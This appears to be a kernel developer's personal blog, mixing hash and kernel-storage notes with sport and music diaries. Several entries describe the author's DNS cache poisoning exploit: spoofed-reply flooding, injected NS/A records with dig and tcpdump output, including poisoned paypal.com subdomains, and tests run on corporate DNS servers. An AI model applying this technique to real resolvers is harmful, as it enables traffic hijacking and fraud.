english ASCII character, i.e. shift value could be bigger to work with higher bytes (so that non-zero bits fit
the new space).
Now because of the time shift I made for myself because of US embassy interview (awake at 5:30 AM, going to sleep at 1:00 AM),
my brain does not allow to work on big projects, so I will try to create an exploit for this hash
standing on regular several-cups-of-cofee drug. Stay tuned!
I got visa after short interview in the USA embassy, so will be Portland September 13-20.
Although consul asked me in russian about what I will be doing in USA, what is my experience,
education and degrees, and so on, I somewhat suddenly started to answer in english.
My 'perfect' pronunciation frequently confused even myself,
but consul looks like understood something from that flow of sounds. I hope he knows
what are filesystems and Linux now.
Lots of people know about very old hash, which uses simple sum and multiplication
technique (works good not only for strings):
unsigned long hash(const char *s)
{
unsigned long h;
for (h = 0; *s; s++) {
h *= 33;
h += *s;
}
return h;
}
This hash appeared in Bernstein's djbdns server quite long ago (although
Dr. Bernstein now favours version with XOR instead of sum), but it looks like
it appeared in comp.lang.c on behalf of
Chris Torek.
I've spent some time on it to determine how it works. One can check clickable picture below to get my thoughts.
Short details below.
Bernstein/Torek hash analysis.
In a nutshell, Bernstein/Torek 33 hash is a linear composition of the input bytes.
Each input byte is multiplied by a constant value (namely 33 in a power, which equals
to the number of bytes minus position of the input word minus one), and then summed.
One can check C source code.
It is simple only because all operations are performed in the same field F(2^32) (namely
sum and multiplication, which is effectively the same), if one would add XOR there (like
Dr. Bernstein did in the recent version), it shifts the whole approach to the mix
of F(2^32) and F(2^1) fields, which is a completely different moster.
In the former case, particulary, it is possible to first multiple/sum lots of elements, and
only then apply modulo operation, while in the latter mixed case it is not easily possible
(well, I'm searching for group algebra books/articles about operations in mixed fields,
so far without much success).
Linear combinations of the input bytes allows very simple way to create an input, which will
have the same output hash value as you want. Actually I do not belive in all those attacks,
which say, that with our technique we managed to reduce something from X to x. Until there
is working realization, which does break appropriate cipher, hash or anything else, it is just
words. I do not have a breaking code right now (although belive that it is simple), so nothing
was broken and in fact can be completely wrong idea :)
But I will develop it to show myself, that my basic algebra skills are still valid...
A while ago I implamented Van Jackobson idea
of netchannels - peer-to-peer
connection module, which pushed all protocol processing as close to the end peers as possible.
In my first realization, TCP processing was done on behalf of running process (instead of mostly bottom-half context),
which resulted in a slightly better performance. Then I implemented
userspace network stack
as a continuation of this idea. Despite its huge performance improvement, I do not think particul reason
is netchannels architecture, but instead amount of syscalls to be made to process bulk traffic flow
via small packets. Nevertheless it can also be considered as a netchannels architecture improvement, which
resulted in so exceptionally good batching abilities.
Now I want to move further: kernel netchannels side will be made completely lockless and simultaneously
very cache-friendly. As in the first implementation, idea is not completely mine, approach I will test
is based on Van Jackobson's array design to store network buffers.
During its lifetime, netchannels got NAT support (actually just to show to those people, who do not belive
in netchannels architecture, that it is possible to implement filtering and packet mangling), but now I drop it
from the project. Netchannels also got tricky multidimentsional trie-based storage, which, after being ported
to the socket core, resulted in a noticeable perforamance
win, although I did not complete
it to support statistics. Actually netchannels implementation of this trie is broken, and it required
quite a few steps in socket code to be fixed.
Now I drop it from netchannels patchset too and move to the usual hash tables.
I will make RCU locking for them and make netchannels hash table optionally automatically resizeable.
This feature does not exist in socket hash tables, but right now I want to experiment smaller code base,
since algorithm I have in mind is a bit tricky.
So, there are lots of interesting ideas, which I've started to work on and plan to finish sooner than later.
But since I will move to the USA counsil department for the interview, and then want to finish appartment development tasks,
and then, hopefully, move to the Kernel Summit and Plumbers conference, it can take quite long... Please
note that I do not forget about other projects.
Code is not dead if not marked appropriately in the TODO list :)
Stay tuned nevertheless!
I did not work with my appartment development quite for a while
already, and it was not because there is nothing to do, but
instead because of my lazyness and lots of other tasks to complete.
Other projects suddenly did not dissapear, but today was so cold
for the summer (and where is the global warming, when it is needed?),
that I decided not to move to the office what I do
every other day.
Today's appartment development included table painting and shower cabin
installation.
Those who follow my blog quite for a while could rememeber that I started to
make my own table many many months ago, but now it is close to its finish
as was never before. The only task to be made is downside drawing and waiting
for layers to become dry. I will then install it to the wall and connect
single leg. This table will not be moved, since it has only single leg
and hardly attached to the walls in the corner.
That is roughly how table will look like.
Color of the left wall is white, back wall
is blue, carpet is somewhat blue too.
Shower cabin installation actually was not planned (as long as anything else),
since I have so strong ceramic tiles on the walls, that usuall thin drill (6 mm) can
only produce single hole, it is almost impossible to drill multiple holes,
since drill becomes blunt. I wanted to move to the development shop and buy
number of special drills for this task, but then decided to experiment with
pobedit drills I have. They are supposed to drill super concrete without problems,
but they failed to work with my ceramic tiles. Well, I killed three drills
and managed to drill 8 holes only, and I needed to first drill smaller hole (4 mm)
and then extend it with 6 mm drill. This is the only way to drill my walls :)
Then I needed to drill a concrete wall, but using perforator and
appropriate augers it is not a complex task at all: several seconds for
6 mm hole with essentially any (supported by the auger of course) depth.
Unfortunately to install a shower cabin I need to have 10 holes: two times of 4 holes
to fix the glass wall guides, since there are two fixed walls and single moving one,
and two holes to fix special stabilizing bar, which is used to hold the walls in a different
dimension. But I did not drill the last two holes, since I have no sharp drills anymore and
would not want to drill the concrete walls with perforator at this time (I believe it is
quite late for this kind of work Sunday evening).
That is how my shower cabin will look like ("Cezares Illusion" model). Interior is different of course.
Also filled number of holes between tiles (which is fixed last time,
when I bought special rubber hammer) with water-resistant paste. Next time
(it would be great to finish it next week, but as usual it can be postponed for the couple of months)
I will complete shower cabin installation, finally install my table, paint appropriate
places and start (or even complete) bricks glueing (well, not bricks itself, but small tiles
with approprite texture) in the kitchen... There are so many things to complete, and although
it requires really not that lots of time, I still can not finish them.
We are the champions of the world dream championship! (that is how it was
called officially)
What I want to note, that our competitors (even the strongest ones) frankly wrote about the
games. I.e. there were not stuff in the blog entries like "they played unfair" or other
similar crap. Everyone agrees that we won just because we were stronger and arrived only to win.
Games were fair, and we were just stronger. Everyone played just bloody cool, and result is fair.
Let's see, what will be in a month at the return championship :)
Today we had a serious football championship against 3 commands.
After 5 hours of games we won the first place. Last year we miserably lose
against our main competitor in this match.
We played play-off scheme and had following scores: 8:2 (against the strongest
team except us) and 7:2 in the final of the championship.
It was not a very simple matches, since we played indoor the first time.
But we had longer football bench (i.e. more players), so we were able to
change players and continue to support overall very fast rate. Also key players
were not tired too much to be able to hold the game even at the very end.
I did not make a goal, but had several precise ball transfers which couple of times
results in a goal. Also had several strikes into the gates area, but with no success,
goalkeepers were good.
Actually I do not consider my contribution as noticeable, but I found my problems in
the game, and thus can try to fix it on trainings.
Because of this exceptionally good result (we won against strong competitors and
even people who work against us sometimes :), we consider to seriously continue
our trainings (rivals ask for return match this September, hopefully I will not
be in USA on conferences).
I will post team and match photos tomorrow. Stay tuned!
DST is a block layer
network device, which among others has following features:
Kernel-side client and server. No need for any special tools for data processing (like special userspace applications) except for configuration.
Bullet-proof memory allocations via memory pools for all temporary objects (transaction and so on).
Zero-copy sending (except header) if supported by device using sendpage().
Failover recovery in case of broken link (reconnection if remote node is down).
Full transaction support (resending of the failed transactions on timeout of after reconnect to failed node).
Dynamically resizeable pool of threads used for data receiving and crypto processing.
Initial autoconfiguration. Ability to extend it with additional attributes if needed.
Support for any kind of network media (not limited to tcp or inet protocols) higher MAC layer (socket layer).
Out of the box kernel-side IPv6 support (needs to extend configuration utility, check how it was done in
POHMELFS).
Security attributes for local export nodes (list of allowed to connect addresses with permissions). Not used currently though.
Ability to use any supported cryptographically strong checksums. Ability to encrypt data channel.
Distributed storage was completely rewritten from scratch recenly. I dropped essentially
mirrored features of teh device mapper in favour of the more robust block io processing
and effective protocol.
One can grab sources (various configuration examples can be found in 'userspace' dir) from
archive,
or via
kernel and
userspace
GIT trees.
And spikes showed that I bought them not for nothing.
Contact with the field was exceptionally good even on very
slick grass, I was able to accelerate and stop really
quickly from essentially all positions. Spikes do not disturb
the hit, although I had not that many possibilities to test it.
And then started the rain. Sometimes it was quite good waterfall with the
strong wind and effectively zero vision where there were no special
field lights (we even moved to the neighbour field because of that).
And you know, I did not even notice that contact with the field changed.
It was exceptionally cool to play in such conditions. One could not go
without contacts and small traumas of course. Well, now I can run on the field
noticebly faster, so contacts become more dangerous, but that's actually
not a problem, I like it.
I've committed changes from Varun Chandramohan (varunc_linux.vnet.ibm.com)
which extends POHMELFS
to support ADD/REMOVE/SHOW configuration groups.
Configuration group is a global object inside pohmelfs core, which contains information about
servers to work with and various configuration parameters. When administrator mounts new pohmelfs
filesystem, he or she has to setup appropriate configuration group and use its index as mount
option parameter. There is special configuration utility for this purpose inside
POHMELFS userspace package.
Now it is possible not only to add or remove groups, but also to show them to the administrator.
I've pushed chages into the kernel
and userspace
GIT trees.
One minute of the free fall from the 4 km high, wing parachute opened after we fell to 1.6 km.
We whirled several times during free fall and then made number of figures
with the parachute. I drove the wing to make several simple figures with quite heavy turns around.
Of course I actually was just a piece of meat linked to the instructor, who really
did all complex parts namely parachute opening, heavy rotations and landing, but it
was my first jump and that was exceptionally cool! I'm sure I will jump again in
Aerograd, but this
time not linked to the instructor but myself (with instructors in the air though).
More photos in the gallery.
There are also two videos (DVD format):
Aerograd promo (185 MB) and
a bit clumpsy video of my
jump itself (474 MB).
Stupid youtube says that I'm 'ineligible' for that service, so there is no compressed version.
Here we go,
DST
got all problems with reference counters fixed, there is somewhat new observation
I made for myself: block device has to provide open and release callbacks to block device
operation structure, which have to increase and decrease appropriate reference counters
of the underlying object, since otherwise it is possible to remove it
with proper del_gendis(), blk_cleanup_queue() and put_disk(),
but some references will exist in the mapping (like in the block device info structure),
so subsequent sync will crash the machine. Also tested lots of reconnection stuff, transaction
resending and timeout and so on.
Actually I would make a new release, but decided to test crypto stuff first. It was copied
from POHMELFS
and should work out of the box, but this requires an additional check of course.
Since tomorrow I will have an almost minute free fall from the several kilometers high
if weather permits, checks, bug fixes and release
are postponed for the start of the week.
Obviously if there will be no 'issues' with landing...
That was somewhat strange playing. I managed to play small octave C# (trumpet Eb), which is beyond
official range, and third E-F (trumpet Gb-G), which are the highest tones in the official trumpet
range. It was not very reliable of course, although third C was played lots of times.
I do not know how I managed to sound them, but I did. Maybe because of two day delay in morning
exercises (what the heck, I can not wake up as early as usual for the last several days).
But when I started to play some melodies (namely
"He's a pirate"
main theme in the 1-2 octaves, second noteset moved to 1A, i.e. one octave higher),
I managed to make lips tired so quickly, that the same 10-20 first notes (not counting introduction)
of the theme sounded cool only couple of times, although I 'played' about a hour.
Strange. Also found that my sounds are not clean (at least in the first octave), since they
also contain sound of the breathing itself, but I noticed it at the end of the exercises, so likely
I was just too tired at the end. But I will continue.
There is a lot of hype around SSD these days... People frequently belive that it is a panacea for
hard drive problems related to random disk access. Let's see, how high-end SSDs behave comapred
to SAS disks.
dirty_writeback_centisecs VM sysctl was set to 3000.
First, single disk performance: SAS vs SSD.
Sequential access speed (both reading and writing) is almost 20% higher for SAS disk than that of SSD.
But let's look at random access speed.
SSD reading jumps to the maximum theoretical 100-120 MB/s plato very quickly (impressive peaks at 64 and 128 KBs,
which can tell us a bit of the firmware structure of the data blocks),
SAS disk is definitely a looser here, since it reaches its maximum performance numbers only at 8-16 MB records.
But SSD random writing is more than two times slower than that of SAS until the latter reaches its maximum performance.
Also very intersting to note, that sequential access is actually noticebly slower than the maximum random access speed for SSD.
Now let's check two-SSD-disk SW RAID-0 array performance with different stripe size.
Random read peaks move around depending on stripe size.
So clearly if your workload depends on random writing, SSD may not be an appropriate solution,
and it is definitely the winner in random reading workload. Please also note, that it was high-end
SSD with 0.1 ms seek latency, and dight now most of the popular SSDs do not have that shiny numbers.
Great thanks to Vladislav Seliverstov for his data and analysis.
I listened so much pride words about how ebooks look and that they allow
to replace the whole your library with single flash-drive.
It can not. It does not know about PDF and DJVU formats. Sony Ebook reader,
Lbook V3, Amazon Kindle - all of them can see it as a picture at best. And it could
be probably not that bad, but neither supports scrolling, so there is virtually no way
to read PDF or DJVU formats there. The whole my library cotnains only that formats.
I naively thought that we live in the 21'th century, when we can flight faster than speed of sound everyday,
look into the deepest corners of the universe, taste Mars' salt, search for Higgs boson and convert from any text representation
format to another one. Obviously I was so mistaken...
Will use old-school paper books (I love it much more than electronic ones anyway) and printed
stack of paper for various articles.
I did not yet test crypto processing (and there is no crypto autonegotiation
yet, I will extend automatic configuration protocol to allow nested attributes,
so it could be extended in the future if there will be any need for new parameters to be
synced between client and server). Also server side does not check security attributes
during connection (like read/write per-address permissions).
Because of excessive logging there were no possibility to check performance issues,
which in turn resulted in a too frequent stale transaction timer fires, excessive resending
and so on, so I introduced maximum amount of work to be done in each scan. With this
change I was able to successfully create ext3 filesystem on 8Gb storage connected
over 3 MB/s link to the remote node.
There is also an issue with broken connection: system tries to reconnect to the server
and does not allow to unload module if there are pending block requests,
each transaction has maximum number of retries, so system waits until each one reaches zero,
which may take too long. This may or may not be a good idea actually, but I think I will
implement transaction flushing during module unloading. Server node has the same issues if there
are pending blocks requested by client and yet not sent.
And although it sounds like a lot of work, it actually is not. I just need not to digress,
which is the most complex part :)
And especially how multiplication and division are performed in finite fields.
So far I run subtraction in a loop to implement modular division in 2^32 field,
which is a bit ugly.
Please drop me a link in comments or send me a
mail, I have a very interesting idea in mind
about some hash analysis. Well, I need to think about something before getting sleep
or while in the transport :)
That was excellent game. And although I did not make any goal this time (we won
with 6:5 score after 1.5 hours of the game, there were two 7x7 commands),
but exactly I made our defence very strong (well, I was
the only full-back player). That was not that complex: just warm
before the game so that I had enough breathing power for the whole match, and
resist the temptation to run to the opposite gates each time, or at least
quickly return and stop attack at the beginning. Couple of goals actually I
helped to make with precise passes (I think legs started to recall it),
but I have to admit that two goals into
our gate are on my conscience: I did not quickly enough returned and made a serious
defence mistake...
I could even make couple of goals, but I prefer to think that I failed because
I still do not have spikes, so it was hard to move on the grass and make really fast
acceleration. My head game was quite precise (well, not always though),
which is only possible without glasses, so I stopped to play in them
couple of games ago. And it indeed produces very good results.
As usual I got some feet damages, but I already think, that it is quite small
problem, so pain stops just in a day or two.
I actually was wrong when
talked
about problems distributed storage
may have with non-page-aligned vectors inside single block rquest. Actually neither client
nor server should not know about how another peer works with given block request. Then only
thing which should be transferred between the peers is start of the request and its size.
And of course flags and operation mode (i.e. automatic sync/barrier support and read/write operation).
That's it. Server will allocate as many pages for the request as needed for own page size,
client will also process them just like a contigous flow of bytes coming out of the network pipe,
which then are placed into number of pages client was asked to read or write. Simple.
BIO can not have holes inside it, but it can have multiple pages
to be partially filled. And this information should not be shared between the nodes at all.
Which basically means that I do not need to even think about how to handle this problems and just
complete protocol between the peers. Stay tuned!
Well, it was not particular musical jam, since he played piano (unbelievable cool
electronic Yamaha) and I just listened, and only couple of times produced some sounds
on my trumpet. I clearly not in the shape to play 'on demand' right now, I'm too
young as a musician :)
We discussed, that except the fact, that electronic piano can sound very fancy,
no matter how cool it is, it still sounds worse than real acoustic one.
I want to get one (and to start getting some lessons with a teacher) sooner or later (and not
particulary soon, just thinking),
and really only like genuine piano sound without all those electronical fuzz around,
so will think some more about possibility to get a real piano to my loft.
Grange is playing his electronic piano
Late night we drunk a bit and played chess. We finished after 5 A.M.
and had 1:1 score after two games. You know, it was quite fun,
although brain did not allow think too deep into the game, so starting idea was quickly confused,
then suddenly after couple of moves new one appeared, then moved to the shadow and so on.
Single game I lost was quite miserable: so stupid errors... :)
Masha and Grange
Masha was not particulary happy about our late drinking game, but she and a soon to be born kid
(ugh, they do not want to know who it will be)
moved to sleep early - they do not like sport :)
I think we need to repeate it again eventually, it was great time!
Trying this monster. It is a voice party for the russian national anthem,
and since I do not understand, how voice (and trumpet) can sound accords, I selected higher part
where needed.
Sometimes it sounds not that bad, although it is definitely not very good. What would you
expect from less than 3 months of trumpet learning...
Basically I can not sound the whole part, since closer to the end lips become too tired, so
I need some small break, which definitely does not exist in the sound rythm. Also I do not know
half of the signs on this notes (well, I do not know notes at all),
so play just how I want it to sound with appropriate notes,
since I know the rythm and usually also each note duration.
Also tried Armstrong's "What a wonderful world" notes, but since I do not know the rythm and do not
have an accompaniment, it was not interesting, although I think a bit simpler than anthem.
Will try to find that song and check how I can play it.
DST
testing revealed number of bugs, which could be easily fixed if I would not need
to debug essentially two separated subsystems of the DST: client and server. Both
share lots of code, but it is quite problematic to find who broke the protocol,
when one of them starts complaining.
So far peers can connect and start initial data exchange, but there is a major problem,
if page size differs on the nodes. Block IO request (bio structure) operates on pages
(stored in the bio_vec structure), and has a size and offset attached to each page.
If page size differs, and server node has smaller page, then it should somehow store information
about how to split own set of pages allocated for given bio size into chunks expected by the
client (since we need to transfer size/offser pair for each page).
There is no such mechanism right now. It is possible to implement naive approach, when
server node will allocate bio pages with sizes requested by the client, but this will break
just after short time, since the only guaranteed kernel allocation in Linux VM is single page.
Another approach is to allocate the whole block request (bio) on the server for each page
of client data (bio_vec structure), but this will have too big overhead on sequential
access and in common case, when page size is equal on both sides of the network channel.
Network block device does not have this problem, since its server lives in userspace and can allocate
arbitrary amount of ram, which will be contiguous in virtual memory. Using virtual memory is very slow,
although it is possible to just allocate needed buffers using vmalloc(). iSCSI uses single
command per block request.
So far I plan to implement following scheme for reading command (which is only one which has described problem):
client will iterate over all block requests in each bio it is about to send, and will send as many commands
as number of non contiguous blocks in given block request. Server will receive that blocks as separate subcommands,
and will allocate a new bio for each such request. Client will need to increment transaction reference counter
to the number of such commands, since server can reply to them in arbitrary order.
In the common case this actually should not happen, and I did not see it in practice either, since most
reading bios come either from readahead (where they are contiguous) or single block requests (which if bigger
than page size will also be contiguous), but nevertheless in theory such bios, where there is number of non-contiguous blocks,
can exist and DST should be ready for them.
Japan does can produce a very tasty whiskey! I recommend 'Suntory Old Whisky' label, although I got the last bottle
in my favourite shop, so I would not be surprised, if it is not that popular drink.
Honda Steed will be my transport for the next season.
I could get this model right now (well, in a month or so to buy and deliver from Japan),
but very soon we will met her, an entity,
which will take 6 month of the year and is blandly called Winter, which is not
appropriate time here for two wheel transport, if it can move faster than 30 km/h.
Yes, footbal was called a contact sport not without a reason:
damaged feet and leg's muscles. It is completely not a problem
(as long as another player does not jump in creeper to the same
place where another shoes were recently) while playing,
but after the training and some rest it becomes quite uncool.
Muscle pain is actually somewhat masochistically pleasant (to some
degree of course), but bones and tendons are aching quite bad.
Well, couple of days to recover and things will be in shape again.
Maybe I will start another sport training, also contact, but quite different,
although I'm quite greedy about time...
Yes, that is how I was called by The Inquirer.
Magazine even put it in bold capital letters :) The rest of the article is quite wrong though (i.e. it is not what was written in my
blog).
Slashdot either got an entry, I was called hacker and then
a physicist there.
That is how I was called in
New York Times
with all this hype about DNS poisoning attack.
Unfortunately I already do not remember what electron charge is
and how to describe Higgs boson even to myself. Things moved away almost 10 years
ago :)
Article says, that DJBDNS does not suffer from this attack. It does. Everyone does.
With some tweaks it can take longer than BIND, but overall problem is there.
But that's enough for this story. I'm moving to another interesting developments.
Exploit
required to send more than 130 thousand of requests for the fake
records like 131737-4795-15081.blah.com to be able to match port
and ID and insert poisoned entry for the poisoned_dns.blah.com.
# dig @localhost www.blah.com +norecurse
; <<>> DiG 9.5.0-P2 <<>> @localhost www.blah.com +norecurse
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6950
;; flags: qr ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; QUESTION SECTION:
;www.blah.com. IN A
;; AUTHORITY SECTION:
www.blah.com. 73557 IN NS poisoned_dns.blah.com.
;; ADDITIONAL SECTION:
poisoned_dns.blah.com. 73557 IN A 1.2.3.4
# named -v
BIND 9.5.0-P2
BIND used fully randomized source port range, i.e. around 64000 ports. Two attacking servers,
connected to the attacked one via GigE link, were used,
each one attacked 1-2 ports with full ID range. Usually attacking server is able to send about 40-50 thousands
fake replies before remote server returns the correct one, so if port was matched probability of
the successful poisoning is more than 60%.
Attack took about half of the day, i.e. a bit less than 10 hours.
So, if you have a GigE lan, any trojaned machine can poison your DNS during one night...
Summary: Almost all problems caused by bugs in Linux,
one problem caused by BIOS vendors interpreting the ACPI specification
differently to the Linux implementation and trivially worked around. No sabotage.
Except the fact, that it only works for 'Windows XXXX' OSI label.
A short analogy.
Before.
Several years ago there were no problems with ndiswrapper driver with wireless NICs.
More years ago there were no problems with reverse engineered drivers for ATA/IDE and usual NICs.
Now.
Try to tell that you do not support Linux as a server platform, so you will not provide
driver or spec for your SATA/SCSI controller or NIC. Some companies even join continual development
of the reverse engineered drivers (wireless, ethernet, (s)ata/ide... But of course there are
exceptions, no need to make it a red point.
Sorry, but we do not support 'Linux' ACPI label in OS/OSI because vendors will not test it and other similar ...
is just a dubious excuse not to push them hard enough. The most exciting example is atheros wireless driver situation.
While a lot of action around filesystems rised recently, I made a short delay
there and concentrated on lower block layer:
DST.
Distributed storage essentially got export capabilities, i.e. data receiving, crypto processing,
block layer request allocation and submitting, reply generation and so on,
although it is more like a proof-of-concept right now, since requires lots and lots
of testing. There are also plans for some additional features, but it is not that lot of work.
So project completion is very close.
POHMELFS
priorities have been switched a bit. After number of talks with people I decided
first to implement the right locking semantics (probably will be turned on/off by mount option),
which would allow simultaneous read/write to be performed the way people expect from local filesystem.
Currently it uses a bit tricky cache coherency protocol, which in some cases can end up with different
results than expected from local filesystem.
Next will be distributed server-side hash table development.
Netchannels will also
get new release very soon. It will be simplified and some unneded funtionality (like netchannels NAT) will be removed.
I will also run some new tests with userspace network stack,
namely latency measurements.
Managed to play this hit of all times and nations:
Which is a sad ballad about fir, which was moved from the forest to make people happy. It tells
us how young always green tree lived in the wild, which beautiful relations it had with the nature,
and then was killed to become a new year fetish.
And do not be fooled by the matter, that it is a song for small kids, a very deep drama is rised there.
Or something like that :)
Sound is not always very good, and the higher I can play (today I moved one note higher in the third
octave, to somewhat around trumpet D, but it is unreliable), the more complex is to play in the first or small
octave. But I practice...
Actually I did
inject 'IN A' entry for the poisoned_dns.blah.com into the cache.
So, to inject arbitrary 'A' entry for the attacked.domain.com into the cache,
one has to bruteforce ID (and match source port if needed) for any other subdomain of the
same level, i.e. subdomain-123.domain.com, and put into additional section
for that message a 'IN NS' record, which would point to attacked.domain.com,
and 'IN A' record with fake IP address for that 'IN NS' one,
i.e. 'IN A' record for the attacked.domain.com pointing to 1.2.3.4.
This method is a bit less flexible, than just poisoning any subdomain with NS
record, which points to the controlled DNS server, but it does not require that server
to exist, so it can route traffic directly to your site without first asking
your DNS server, where given subdomain lives.
# ping poisoned_dns.blah.com -c100 > /dev/null 2>&1 &
# tcpdump -nn icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
11:27:20.422124 IP devfs1 > 1.2.3.4: ICMP echo request, id 55367, seq 5, length 64
11:27:20.422333 IP gw > devfs1: ICMP host 1.2.3.4 unreachable, length 36
11:27:21.422126 IP devfs1 > 1.2.3.4: ICMP echo request, id 55367, seq 6, length 64
11:27:21.422310 IP gw > devfs1: ICMP host 1.2.3.4 unreachable, length 36
11:27:22.422123 IP devfs1 > 1.2.3.4: ICMP echo request, id 55367, seq 7, length 64
11:27:22.422286 IP gw > devfs1: ICMP host 1.2.3.4 unreachable, length 36
11:27:23.423122 IP devfs1 > 1.2.3.4: ICMP echo request, id 55367, seq 8, length 64
11:27:23.423311 IP gw > devfs1: ICMP host 1.2.3.4 unreachable, length 36
I managed to inject following poisoning information:
# dig @localhost +norecurse www.blah.com any
;; ANSWER SECTION:
www.blah.com. 123452 IN NS poisoned_dns.blah.com.
;; AUTHORITY SECTION:
www.blah.com. 123452 IN NS poisoned_dns.blah.com.
;; ADDITIONAL SECTION:
poisoned_dns.blah.com. 123452 IN A 1.2.3.4
# dig @localhost www.blah.com
The last command results in the following dump:
01:36:14.567622 IP devfs1.5301 > 1.2.3.4.53: 42416% [1au] A? www.blah.com. (41)
01:36:15.067816 IP devfs1.5301 > 1.2.3.4.53: 29011% [1au] A? www.blah.com. (41)
01:36:15.568013 IP devfs1.5301 > 1.2.3.4.53: 30586 A? www.blah.com. (30)
01:36:16.568182 IP devfs1.5301 > 1.2.3.4.53: 38101 A? www.blah.com. (30)
01:36:18.568429 IP devfs1.5301 > 1.2.3.4.53: 64596 A? www.blah.com. (30)
01:36:22.568634 IP devfs1.5301 > 1.2.3.4.53: 59943 A? www.blah.com. (30)
01:36:30.568960 IP devfs1.5301 > 1.2.3.4.53: 39614 A? www.blah.com. (30)
01:36:40.569163 IP devfs1.5301 > 1.2.3.4.53: 13769 A? www.blah.com. (30)
So, effectively if I would control 1.2.3.4 machine I would be able to
answer to that queries with controlled address. I was not able
to inject 'A' record for any domain except one which was happend to
match id in my fake responses, and it looks like 'A' records are not accepted
at all (I'm far from being a DNS expert).
So, actually I consider this exploit
as a completed one, which is capable of arbitrary
NS record poisoning. Its performance is rather good: poisoning attack
requires 1-3 (sometimes more, it heavily depends on link capacity and auth dns server
performance) queries from the client to authoritative DNS server. Attacking server,
connected via gigabit link,
is easily capable to saturate whole DNS ID space while attacked resolver waits for
reply from the remote server. Math tells me that 100 mbit connection will require
about two times more requests to be sent by the client, which is still not that much.
Server side of the exploit requires root priveledges to run, since it uses raw socket
to create a datagram with IP addresses used by attacked server and appropriate authoritative
name server. Client connects to one or more attacking servers, sends them appropriate response message
and issues a DNS request for that response to the attacked server. Poisoning servers start to
flood attacked server with replies, until client sends them next reply to bomb. When client receives
fake answer from poisoned DNS server, attack stops. Exploit allows you to specify
name server to attack, NS query to inject and DNS name to have that NS record.
Having hard GigE performance numbers, I can say, that port randomization completely does not
solve DNS poisoning attack (although makes it harder), since with such link capacity attacker only needs to guess
the port, and ID space will be bruteforced before reply is received from the authoritative name server.
So far I can not test randomized-port BIND, since local Debian mirror has somehow unsigned package
for it, so I will not install it right now, but will do it later and provide numbers with randomized
server. I expect to be able to poison even that server, although not that fast as with constant port.
# dig @devfs1 3-c13a-15729.paypal.com.
; <<>> DiG 9.5.0-P2 <<>> @devfs1 3-c13a-15729.paypal.com.
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18330
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 0
;; QUESTION SECTION:
;3-c13a-15729.paypal.com. IN A
;; ANSWER SECTION:
3-c13a-15729.paypal.com. 123405 IN A 1.2.3.4
# dig 1-71b2-16080.money.paypal.com.
...
;; ANSWER SECTION:
1-71b2-16080.money.paypal.com. 123421 IN A 1.2.3.4
# dig @localhost 29-07f3-16098.test.com
...
;; ANSWER SECTION:
29-07f3-16098.test.com. 123411 IN A 1.2.3.4
Although it is not a complete win yet: additional section from the poisoning packet
was parsed, and entry looks like inserted into DNS server database, but subsequent
request ends up with querying remote server. Probably because my fake requests do not
contain authority section, so I will extend it and continue this game :)
Ugh, 4 A.M. My body, soul and what else wants to sleep will all hate me tomorrow.
I was called a saboteur, although no one was able
to answer, what will happen, if the same load will
be performed by some virus or trojan.
Nevertheless I played some politic game, had some talks,
which I managed to cool down from angry to fun strain,
and eventually got access again.
I installed BIND on one of the servers, which by the coincidence
does not have port randomization fix, so it issues all requests from
the 5301 port. I fixed IP header initialization, so now attacking
servers send its fake DNS replies not with own IP address as a source
(that's likely was one of the main if not main reasons machines
were disabled), but using appropriate auth DNS server IP address.
Also found an interesting moment with DNS server traffic: resolver server's network
channel is so much loaded with small UDP fake DNS replies, that other ones
almost can not sneak in, so effectively real reply comes almost after the whole
ID range has been bruteforced. I remind that this is a GigE linked
machines, and attacking servers send about 200-300 thousands packets per second
average, dropping rate is about 30% (only about 45 thousands packets are received
from more than 65.000 being sent).
This basically means, that in this particular case probability of the successful poisoning
with port randomization is only limited by random port number, and random ID
almost does not play any role (since traffic generated by the attacking server will
eat the bandwidth and will not allow real reply to come first), so one should just
guess the port number and attack will succeed.
I will try to prove this theory tomorrow as long as confirm that my
exploit works.
So, this foolball training brought another pain in feet,
leg muscles and a bit in my neck.
So far so good, and muscle pain is actually pleasant,
but aching bones and tendons are not that good, so now I have
several new bumps over the body...
Nevertheless, it was a good game, although I like to play
in weaker command, since I believe the only way to get new experience
and become better player is to play against stronger opponent.
The same actually concerns all other areas. Today we were stronger
by personal skills, but somewhat weaker (maybe even much) as
a command.
Implement LSM module, which 'guards' some configured dir,
so that every read/write/lookup/readdir for any object from there
would require a cryptographically strong authentification, otherwise
an empty dir (or some other 'old' content) is shown. Applications
from the previous
round are those ones which are capable to communicate this system,
and thus are capable to read and write directory content.
There is a problem with the case when this filesystem is being read on the
system which does not have that magic LSM module to authentificate reading.
We do not want to produce garbage directory content in this case, and instead
empty dir should be returned. This can be achieved by hiding actual encrypted directory content
links not in the parent dir (so it could be read as garbage without security module),
but in some other place (like extended attributes), which can be decrypted by
security module only.
In this case reading from directory without security module will result in getting empty context,
since every read and write to the directory made with security module, resulted in update
of special extended attribute and not actual inode. New inodes still exist in the FS
and contain valid data (everything is just encrypted) but they are linked to hidden in extended
attributes inode instead of actual directory inode. Security module allows to redirect
directory operations to the that hidden object instead of visible one.
This approach should work ok with all underlying filesystems, since extended attributes
management has generic helpers with appropriate callbacks to the FS code.
Need to think, although updated security ideas
TODO entry...
I've just thought out an excellent project on how to control/tune
various kernel subsystems behaviour based on game theory approaches.
The simplest one is block layer scheduler, which results in maximization of
the performance for all participating users.
Just a though so far of course, but I want to dig out my books from the dust grave for the
before-sleep reading...
Meanwhile DST project
got some features implemented to date: I put network async processing from own threads into per-node
thread pool, crypto processing utilizes others. DST is also able to create and send (encrypted and/or
hashed if needed) full block IO transaction. Now its time to implement completion handling (its just a search
for given transaction and dst_trans_put() call, which will complete block IO request if there are no
users of the transaction anymore), read/write processing for the server part and client accepting machinery
for the server.
Disabled account and turned off access to the servers.
And it is just because of several minutes of 200+ kpps
UDP DNS response storms from three machines to one of the corporate DNS servers
(I think there are hundreds of them, I just got access to couple).
Who the hell monitors it Saturday night at 2 A.M.? I specially selected
